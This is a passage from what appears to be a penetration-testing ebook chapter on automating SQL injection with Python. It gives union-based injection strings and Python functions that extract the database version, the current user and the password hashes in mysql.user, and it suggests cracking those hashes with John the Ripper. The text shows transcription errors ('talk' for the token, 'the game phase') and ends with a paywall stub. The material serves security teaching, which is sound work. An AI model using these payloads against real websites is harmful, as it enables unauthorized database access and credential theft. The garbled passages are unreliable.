Automating basic extractions

The first thing we want to obtain after we get a working SQL injection is information about the database we're working with, such as the database version, the current user, the current database, and so on.

In order to do so, we need to use SELECT @@ version;. We'll obtain the database version. SELECT user();, will get you the user that is running the database. For our example, we must use the following injection to get the version; 'union SELECT1, @@version;-- -. We need 1 before the @@version to match the number of columns we have on the query, which is the number of columns that have been affected by the SQL injection.

In our case, there were two columns; that's why we add 1.

Let's go to our editor and continue with the file SQLinjector-2.py. We have added two new functions in order to obtain the version and current user from the database. You will notice that we have the following injection:

def detect_user(url):
  new_url= url.replace("FUZZ","""'%20union%20SELECT%201,CONCAT('TOK',user(),
  'TOK')--%20-""")
  req=requests.get(new_url)
  raw = req.content
  reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
  users=re.findall(reg,req.content)
  for user in users:
    print user
  return user

def detect_version(url):
  new_url= url.replace("FUZZ","'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK')--%20-")
  req=requests.get(new_url)
  raw = req.content
  reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
  version=re.findall(reg,req.content)
  for ver in version:
    print ver
  return ver

The %20 is the URL encoded version of the space character. We are using the CONCAT command to concatenate the string talk at the beginning of the result and at the end. The strings will serve as tokens to identify the output of the query in the HTML result. Now, we'll see the code we need to extract the version.

We do this by processing the results using a regular expression to identify the tokens talk and extract the string found between them. We define the regular expression, then we use the findall function from the re library with the content of the request response, and then we iterate over the results.

In this case, there should be only one. We will do the same process to get the database version by using @@version instead of user.

Now, we want to obtain the MySQL usernames and password hashes. The query we need for this is SELECT user, password from mysql.user;.

Remember that this will only work if the user that is making the connection to the database has the privileges to access the table. Best practices recommend the game phase, but many people still do it.

We added the function steal_users to extract this data. We'll use the same techniques as before with the tokens to identify the output in the HTML results. Let's run it in the command line and see the outputs. We'll use the same command line as before:

Now, we can see the new data that has been extracted. The database version is printed. In this case, it is 5.6.28. It also gives us a hint on the OS; Ubuntu 15.10.1. The user running the database is root, which means that we have high privileges that will allow us to do more interesting things such as, for example, accessing the table MySQL.user, where the usernames and passwords hashes are stored.

We can see the hashes for the user rootdebian-sys-maint, and phpmyadmin. The repetitions are happening because of the different host entries that are associated with each user. These password hashes can be cracked with a tool like John the ripper if you need to do so. Great. You have a pretty good idea of the target, so let's continue extracting data.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.191.102.112